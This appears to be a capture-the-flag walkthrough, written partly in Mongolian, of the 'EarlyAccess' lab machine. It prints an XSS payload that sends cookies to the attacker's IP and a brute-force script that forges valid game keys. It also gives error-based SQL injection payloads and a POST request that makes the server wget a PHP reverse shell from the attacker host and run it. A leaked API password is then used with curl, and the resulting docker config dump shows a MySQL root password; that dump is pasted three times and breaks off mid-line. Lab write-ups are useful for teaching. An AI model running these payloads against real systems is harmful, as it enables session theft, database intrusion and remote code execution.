1. IP Address
# Machine Address
10.10.11.110
# Local Address
10.10.14.12
2. Nmap
CLI:
nmap -sV -sC -oA nmap/early_access 10.10.11.110
Out:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-01 02:20 EST
Nmap scan report for 10.10.11.110
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e4:66:28:8e:d0:bd:f3:1d:f1:8d:44:e9:14:1d:9c:64 (RSA)
| 256 b3:a8:f4:49:7a:03:79:d3:5a:13:94:24:9b:6a:d1:bd (ECDSA)
|_ 256 e9:aa:ae:59:4a:37:49:a6:5a:2a:32:1d:79:26:ed:bb (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to https://earlyaccess.htb/
443/tcp open ssl/http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: EarlyAccess
| ssl-cert: Subject: commonName=earlyaccess.htb/organizationName=EarlyAccess Studios/stateOrProvinceName=Vienna/countryName=AT
| Not valid before: 2021-08-18T14:46:57
|_Not valid after: 2022-08-18T14:46:57
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: Host: 172.18.0.102; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.44 seconds
3. XSS
XXS change username:
<script>var i=new Image;i.src="https://10.10.14.7/443"+document.cookie;</script>
VM-с http асаах:
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
# openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import http.server
import ssl
server_address = ('10.10.14.7', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
server_side=True,
certfile="server.pem",
keyfile="key.pem",
ssl_version=ssl.PROTOCOL_TLS)
httpd.serve_forever()
python3 listener:
"GET /443XSRF-TOKEN=eyJpdiI6InBNMm9FV3Frd1hqOVJSem1BbjFHckE9PSIsInZhbHVlIjoid05TbWpTRHowTWRKemlvdjZHaytITTFNU2xnckFmK2dOTWhHc0grdlRWbU9SK280V0hydGdVMjZjUjI5OFFtekVabWRPZnlJTWxEK0hLd1hJa1pIb1RGcTUzQ0pzOVpNYmw1RHdIZjJRY09peFV6K3JBS1dPYjVSS3M3OVBieC8iLCJtYWMiOiIyMTFiNzIzYjBlNWQ3M2E5NzliYTdmNzJlMmE2MTNmZDAxZTAxN2Q5YzJkNWU2OGFlNjYyYTVlYjYzYzQ5NzM1In0%3D;%20earlyaccess_session=eyJpdiI6IjU2ekxPNmNDdkdna1BnQkh4YkFlcUE9PSIsInZhbHVlIjoiSld1SXhmUkh0dzZUemREYU1uejZnU2ZHZVRBakJrbTE2bStvd2M1dUZqdFNza01vdzExM0IvdHJSdE53Ym90R1FqMXhwT0piQ3RlcFA4Mi9FNkNSc1kxTEQvUUMzZFl6ak9CemZtU0kvZUY0cDJXVHpXNTh6MFhOZmZVZmJ6ZlYiLCJtYWMiOiJjODI4NTc2NDE1MmJmNmQwMDE4ZmE5MTJlNWRhYzBiZGM1Y2IyMTI2NmVhYmYxODY4YzkwZjEwMDk2Y2UwYzE3In0%3D HTTP/1.1" 404 -
XSRF-TOKEN
eyJpdiI6InBNMm9FV3Frd1hqOVJSem1BbjFHckE9PSIsInZhbHVlIjoid05TbWpTRHowTWRKemlvdjZHaytITTFNU2xnckFmK2dOTWhHc0grdlRWbU9SK280V0hydGdVMjZjUjI5OFFtekVabWRPZnlJTWxEK0hLd1hJa1pIb1RGcTUzQ0pzOVpNYmw1RHdIZjJRY09peFV6K3JBS1dPYjVSS3M3OVBieC8iLCJtYWMiOiIyMTFiNzIzYjBlNWQ3M2E5NzliYTdmNzJlMmE2MTNmZDAxZTAxN2Q5YzJkNWU2OGFlNjYyYTVlYjYzYzQ5NzM1In0%3D
20earlyaccess_session:
eyJpdiI6IjU2ekxPNmNDdkdna1BnQkh4YkFlcUE9PSIsInZhbHVlIjoiSld1SXhmUkh0dzZUemREYU1uejZnU2ZHZVRBakJrbTE2bStvd2M1dUZqdFNza01vdzExM0IvdHJSdE53Ym90R1FqMXhwT0piQ3RlcFA4Mi9FNkNSc1kxTEQvUUMzZFl6ak9CemZtU0kvZUY0cDJXVHpXNTh6MFhOZmZVZmJ6ZlYiLCJtYWMiOiJjODI4NTc2NDE1MmJmNmQwMDE4ZmE5MTJlNWRhYzBiZGM1Y2IyMTI2NmVhYmYxODY4YzkwZjEwMDk2Y2UwYzE3In0%3D
4. Exploitation
Cookie солиод харвал админ панел, http://dev.earlyaccess.htb/ subdomain харагдаж байна.
group1-group2-group3-group4-group5
#!/usr/bin/env python3
import sys
from re import match
class Key:
key = ""
magic_value = "XP" # Static (same on API)
magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
def __init__(self, key:str, magic_num:int=346):
self.key = key
if magic_num != 0:
self.magic_num = magic_num
@staticmethod
def info() -> str:
return f"""
# Game-Key validator #
Can be used to quickly verify a user's game key, when the API is down (again).
Keys look like the following:
AAAAA-BBBBB-CCCC1-DDDDD-1234
Usage: {sys.argv[0]} <game-key>"""
def valid_format(self) -> bool:
return bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$", self.key))
def calc_cs(self) -> int:
gs = self.key.split('-')[:-1]
return sum([sum(bytearray(g.encode())) for g in gs])
def g1_valid(self) -> bool:
g1 = self.key.split('-')[0]
r = [(ord(v)<<i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
if r != [221, 81, 145]:
return False
for v in g1[3:]:
try:
int(v)
except:
return False
return len(set(g1)) == len(g1)
def g2_valid(self) -> bool:
g2 = self.key.split('-')[1]
p1 = g2[::2]
p2 = g2[1::2]
return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
def g3_valid(self) -> bool:
# TODO: Add mechanism to sync magic_num with API
g3 = self.key.split('-')[2]
if g3[0:2] == self.magic_value:
return sum(bytearray(g3.encode())) == self.magic_num
else:
return False
def g4_valid(self) -> bool:
return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0], self.key.split('-')[3])] == [12, 4, 20, 117, 0]
def cs_valid(self) -> bool:
cs = int(self.key.split('-')[-1])
return self.calc_cs() == cs
def check(self) -> bool:
if not self.valid_format():
print('Key format invalid!')
return False
if not self.g1_valid():
return False
if not self.g2_valid():
return False
if not self.g3_valid():
return False
if not self.g4_valid():
return False
if not self.cs_valid():
print('[Critical] Checksum verification failed!')
return False
return True
if __name__ == "__main__":
if len(sys.argv) != 2:
print(Key.info())
sys.exit(-1)
input = sys.argv[1]
validator = Key(input)
if validator.check():
print(f"Entered key is valid!")
else:
print(f"Entered key is invalid!")
Note: Python ord() function returns the Unicode code from a given character. This function accepts a string of unit length as an argument and returns the Unicode equivalence of the passed argument. In other words, given a string of length 1, the ord() function returns an integer representing the Unicode code point of the character when an argument is a Unicode object, or the value of the byte when the argument is an 8-bit string.
#!/usr/bin/env python3
import string
AtoZ = list(string.ascii_uppercase)
digits = list(string.digits)
all_strings = AtoZ + digits
print(all_strings)
i = 2
for v in all_strings:
r = [(ord(v) << i + 1) % 256 ^ ord(v)]
if r[0] == int(145):
print(v)
print(v, "<-->", sum(bytearray(v.encode())))
['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1',
'2', '3', '4', '5', '6', '7', '8', '9']
A <--> 65
B <--> 66
C <--> 67
D <--> 68
E <--> 69
F <--> 70
G <--> 71
H <--> 72
I <--> 73
J <--> 74
K <--> 75
L <--> 76
M <--> 77
N <--> 78
O <--> 79
P <--> 80
Q <--> 81
R <--> 82
S <--> 83
T <--> 84
U <--> 85
V <--> 86
W <--> 87
X <--> 88
Y
Y <--> 89
Z <--> 90
0 <--> 48
1 <--> 49
2 <--> 50
3 <--> 51
4 <--> 52
5 <--> 53
6 <--> 54
7 <--> 55
8 <--> 56
9 <--> 57
magic_num = 346
178 = 346 - 168
min = 178
ALPHABET1 = "ABCDEFGHJKLMNOPQSTYUWZ"
NUM = "0123456789"
for x in ALPHABET1:
for y in ALPHABET1:
for z in NUM:
res = int(ord(x)) + int(ord(y)) + int(ord(z))
if res >= min:
group = "XP" + x + y + z
gs = ["KEY19", "1A1R1"]
gs.append(group)
gs.append("GAMD9")
lastgrp = sum([sum(bytearray(g.encode())) for g in gs])
print("KEY19-1A1R1-" + group + "-GAMD9-" + str(lastgrp))
min = min + 1
KEY19-1A1R1-XPAA0-GAMD9-1317
KEY19-1A1R1-XPAA1-GAMD9-1318
KEY19-1A1R1-XPAA2-GAMD9-1319
KEY19-1A1R1-XPAA3-GAMD9-1320
KEY19-1A1R1-XPAA4-GAMD9-1321
KEY19-1A1R1-XPAA5-GAMD9-1322
KEY19-1A1R1-XPAA6-GAMD9-1323
KEY19-1A1R1-XPAA7-GAMD9-1324
KEY19-1A1R1-XPAA8-GAMD9-1325
KEY19-1A1R1-XPAA9-GAMD9-1326
KEY19-1A1R1-XPAB9-GAMD9-1327
KEY19-1A1R1-XPAC9-GAMD9-1328
KEY19-1A1R1-XPAD9-GAMD9-1329
KEY19-1A1R1-XPAE9-GAMD9-1330
KEY19-1A1R1-XPAF9-GAMD9-1331
KEY19-1A1R1-XPAG9-GAMD9-1332
KEY19-1A1R1-XPAH9-GAMD9-1333
KEY19-1A1R1-XPAJ8-GAMD9-1334
KEY19-1A1R1-XPAJ9-GAMD9-1335
KEY19-1A1R1-XPAK9-GAMD9-1336
KEY19-1A1R1-XPAL9-GAMD9-1337
KEY19-1A1R1-XPAM9-GAMD9-1338
KEY19-1A1R1-XPAN9-GAMD9-1339
KEY19-1A1R1-XPAO9-GAMD9-1340
KEY19-1A1R1-XPAP9-GAMD9-1341
KEY19-1A1R1-XPAQ9-GAMD9-1342
KEY19-1A1R1-XPAS8-GAMD9-1343
KEY19-1A1R1-XPAS9-GAMD9-1344
KEY19-1A1R1-XPAT9-GAMD9-1345
KEY19-1A1R1-XPAY5-GAMD9-1346
KEY19-1A1R1-XPAY6-GAMD9-1347
KEY19-1A1R1-XPAY7-GAMD9-1348
KEY19-1A1R1-XPAY8-GAMD9-1349
KEY19-1A1R1-XPAY9-GAMD9-1350
KEY19-1A1R1-XPAZ9-GAMD9-1351
KEY19-1A1R1-XPBZ9-GAMD9-1352
KEY19-1A1R1-XPCZ9-GAMD9-1353
KEY19-1A1R1-XPDZ9-GAMD9-1354
KEY19-1A1R1-XPEZ9-GAMD9-1355
KEY19-1A1R1-XPFZ9-GAMD9-1356
KEY19-1A1R1-XPGZ9-GAMD9-1357
KEY19-1A1R1-XPHZ9-GAMD9-1358
KEY19-1A1R1-XPJY9-GAMD9-1359
KEY19-1A1R1-XPJZ9-GAMD9-1360
KEY19-1A1R1-XPKZ9-GAMD9-1361
KEY19-1A1R1-XPLZ9-GAMD9-1362
KEY19-1A1R1-XPMZ9-GAMD9-1363
KEY19-1A1R1-XPNZ9-GAMD9-1364
KEY19-1A1R1-XPOZ9-GAMD9-1365
KEY19-1A1R1-XPPZ9-GAMD9-1366
KEY19-1A1R1-XPQZ9-GAMD9-1367
KEY19-1A1R1-XPSY9-GAMD9-1368
KEY19-1A1R1-XPSZ9-GAMD9-1369
KEY19-1A1R1-XPTZ9-GAMD9-1370
KEY19-1A1R1-XPYY6-GAMD9-1371
KEY19-1A1R1-XPYY7-GAMD9-1372
KEY19-1A1R1-XPYY8-GAMD9-1373
KEY19-1A1R1-XPYY9-GAMD9-1374
KEY19-1A1R1-XPYZ9-GAMD9-1375
KEY19-1A1R1-XPZZ9-GAMD9-1376
Дээр байгаа боломжит түхлүүр бүрээр валид хийхийг нь оруулаад dev. subdomain руу орно. Энэ хэсгээс SQL Injection.
энэ одоогоор ажиллаж байна
KEY19-1A1R1-XPAQ9-GAMD9-1342
4.1 SQL Injection
game болон earlyaccess бүртгэлтэй хэрэглэгчийн нэрийг порфайл хэсгээс өөрчилж үзнэ.
ca4mi') and updatexml(1,concat(0x7e,(@@version),0x7e),1) #
Result (@Scoreboard):
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~8.0.25~'
sql injection #1:
ca4mi') and updatexml(1,make_set(3,'',(select table_name from information_schema.tables where table_schema=database() limit 2,1)),1) #
Result:
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ',users'
sql injection #2:
jade') and updatexml(1,make_set(3,'',(select column_name from information_schema.columns where table_name='users' limit 1,1)),1) #
Result
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ',email'
sql injection #3:
ca4mi') and updatexml(1,make_set(3,'',(select column_name from information_schema.columns where table_name='users' limit 5,1)),1) #
Result:
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ',password'
Ингэж sql injection хийж яваад admin@earlyaccess.htb хэрэглэгчийн нууц үгийг database -с олоод hash - г тайлаад dev.earlyaccess.htb руу админ нэр нууц үгээр нэвтрэн орж hash.php хэсэгт listener асаах юм байна.
https://github.com/pentestmonkey/php-reverse-shell - reverse shell татаж аваад ip, port локал vm болгож солиод hash.php хэсэгт дараах маягаар action хийнэ. Локал VM дээр http.server, nc асаана.
POST /actions/hash.php HTTP/1.1
Host: dev.earlyaccess.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://dev.earlyaccess.htb
DNT: 1
Connection: close
Referer: http://dev.earlyaccess.htb/home.php?tool=hashing
Cookie: PHPSESSID=079a3696c6388d0aa3a74e9ed793e559
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
action=hash&hash_function=exec&password=wget http://10.10.14.7:8000/php-reverse-shell.php -O /tmp/1.php;php /tmp/1.php&debug=1
4.2 Shell balance:
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo
f+g [enter enter]
буцаад nc орлоо:
export TERM=xterm
su -l www-adm
4.3 linpeas
[+] Finding passwords inside key folders (limit 70) - no PHP files
bash: line 2185: printf: `?': invalid format character
/home/www-adm/.wgetrc:password=s3CuR3_API_PW!
[+] Networks and neighbours
Iface Destination Gateway Flags RefCnt Use Metric Mask MTU Window IRTT
eth0 00000000 010012AC 0003 0 0 0 00000000 000
eth0 000012AC 00000000 0001 0 0 0 0000FFFF 000
IP address HW type Flags HW address Mask Device
172.18.0.2 0x1 0x2 02:42:ac:12:00:02 * eth0
172.18.0.100 0x1 0x2 02:42:ac:12:00:64 * eth0
172.18.0.1 0x1 0x2 02:42:b1:d2:79:25 * eth0
172.18.0.101 0x1 0x2 02:42:ac:12:00:65 * eth0
nc -v -z -n 172.18.0.1 1-65535
(UNKNOWN) [172.18.0.1] 443 (https) open
(UNKNOWN) [172.18.0.1] 80 (http) open
(UNKNOWN) [172.18.0.1] 22 (ssh) open
curl -u 'api:s3CuR3_API_PW!' http://172.18.0.101:5000/check_db
{"message":{"AppArmorProfile":"docker-default","Args":["--character-set-server=utf8mb4","--collation-server=utf8mb4_bin","--skip-character-set-client-handshake","--max_allowed_packet=50MB","--general_log=0","--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"],"Config":{"AttachStderr":false,"AttachStdin":false,"AttachStdout":false,"Cmd":["--character-set-server=utf8mb4","--collation-server=utf8mb4_bin","--skip-character-set-client-handshake","--max_allowed_packet=50MB","--general_log=0","--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"],"Domainname":"","Entrypoint":["docker-entrypoint.sh"],"Env":["MYSQL_DATABASE=db","MYSQL_USER=drew","MYSQL_PASSWORD=drew","MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5","SERVICE_TAGS=dev","SERVICE_NAME=mysql","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","GOSU_VERSION=1.12","MYSQL_MAJOR=8.0","MYSQL_VERSION=8.0.25-1debian10"],"ExposedPorts":{"3306/tcp":{},"33060/tcp":{}},"Healthcheck":{"Interval":5000000000,"Retries":3,"Test":["CMD-SHELL","mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"],"Timeout":2000000000},"Hostname":"mysql","Image":"mysql:latest","Labels":{"com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"app","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/app","com.docker.compose.service":"mysql","com.docker.compose.version":"1.29.1"},"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":true,"User":"","Volumes":{"/docker-entrypoint-initdb.d":{},"/var/lib/mysql":{}},"WorkingDir":""},"Created":"2022-01-07T08:12:13.704127504Z","Driver":"overlay2","ExecIDs":null,"GraphDriver":{"Data":{"LowerDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff","MergedDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/merged","UpperDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/diff","WorkDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/work"},"Name":"overlay2"},"HostConfig":{"AutoRemove":false,"Binds":["/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro","app_vol_mysql:/var/lib/mysql:rw"],"BlkioDeviceReadBps":null,"BlkioDeviceReadIOps":null,"BlkioDeviceWriteBps":null,"BlkioDeviceWriteIOps":null,"BlkioWeight":0,"BlkioWeightDevice":null,"CapAdd":["SYS_NICE"
{"message":{"AppArmorProfile":"docker-default","Args":["--character-set-server=utf8mb4","--collation-server=utf8mb4_bin","--skip-character-set-client-handshake","--max_allowed_packet=50MB","--general_log=0","--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"],"Config":{"AttachStderr":false,"AttachStdin":false,"AttachStdout":false,"Cmd":["--character-set-server=utf8mb4","--collation-server=utf8mb4_bin","--skip-character-set-client-handshake","--max_allowed_packet=50MB","--general_log=0","--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"],"Domainname":"","Entrypoint":["docker-entrypoint.sh"],"Env":["MYSQL_DATABASE=db","MYSQL_USER=drew","MYSQL_PASSWORD=drew","MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5","SERVICE_TAGS=dev","SERVICE_NAME=mysql","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","GOSU_VERSION=1.12","MYSQL_MAJOR=8.0","MYSQL_VERSION=8.0.25-1debian10"],"ExposedPorts":{"3306/tcp":{},"33060/tcp":{}},"Healthcheck":{"Interval":5000000000,"Retries":3,"Test":["CMD-SHELL","mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"],"Timeout":2000000000},"Hostname":"mysql","Image":"mysql:latest","Labels":{"com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"app","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/app","com.docker.compose.service":"mysql","com.docker.compose.version":"1.29.1"},"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":true,"User":"","Volumes":{"/docker-entrypoint-initdb.d":{},"/var/lib/mysql":{}},"WorkingDir":""},"Created":"2022-01-07T08:12:13.704127504Z","Driver":"overlay2","ExecIDs":null,"GraphDriver":{"Data":{"LowerDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff","MergedDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/merged","UpperDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/diff","WorkDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/work"},"Name":"overlay2"},"HostConfig":{"AutoRemove":false,"Binds":["/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro","app_vol_mysql:/var/lib/mysql:rw"],"BlkioDeviceReadBps":null,"BlkioDeviceReadIOps":null,"BlkioDeviceWriteBps":null,"BlkioDeviceWriteIOps":null,"BlkioWeight":0,"BlkioWeightDevice":null,"CapAdd":["SYS_NICE"
{"message":{"AppArmorProfile":"docker-default","Args":["--character-set-server=utf8mb4","--collation-server=utf8mb4_bin","--skip-character-set-client-handshake","--max_allowed_packet=50MB","--general_log=0","--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"],"Config":{"AttachStderr":false,"AttachStdin":false,"AttachStdout":false,"Cmd":["--character-set-server=utf8mb4","--collation-server=utf8mb4_bin","--skip-character-set-client-handshake","--max_allowed_packet=50MB","--general_log=0","--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"],"Domainname":"","Entrypoint":["docker-entrypoint.sh"],"Env":["MYSQL_DATABASE=db","MYSQL_USER=drew","MYSQL_PASSWORD=drew","MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5","SERVICE_TAGS=dev","SERVICE_NAME=mysql","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","GOSU_VERSION=1.12","MYSQL_MAJOR=8.0","MYSQL_VERSION=8.0.25-1debian10"],"ExposedPorts":{"3306/tcp":{},"33060/tcp":{}},"Healthcheck":{"Interval":5000000000,"Retries":3,"Test":["CMD-SHELL","mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"],"Timeout":2000000000},"Hostname":"mysql","Image":"mysql:latest","Labels":{"com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"app","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/app","com.docker.compose.service":"mysql","com.docker.compose.version":"1.29.1"},"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":true,"User":"","Volumes":{"/docker-entrypoint-initdb.d":{},"/var/lib/mysql":{}},"WorkingDir":""},"Created":"2022-01-07T08:12:13.704127504Z","Driver":"overlay2","ExecIDs":null,"GraphDriver":{"Data":{"LowerDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff","MergedDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/merged","UpperDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/diff","WorkDir":"/var/lib/docker/overlay2/ae979fa9158b6134ba08b7c587648c193d3fb8be2283dc5173a1e7403f0ff72a/work"},"Name":"overlay2"},"HostConfig":{"AutoRemove":false,"Binds":["/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro","app_vol_mysql:/var/lib/mysql:rw"],"BlkioDeviceReadBps":null,"Blki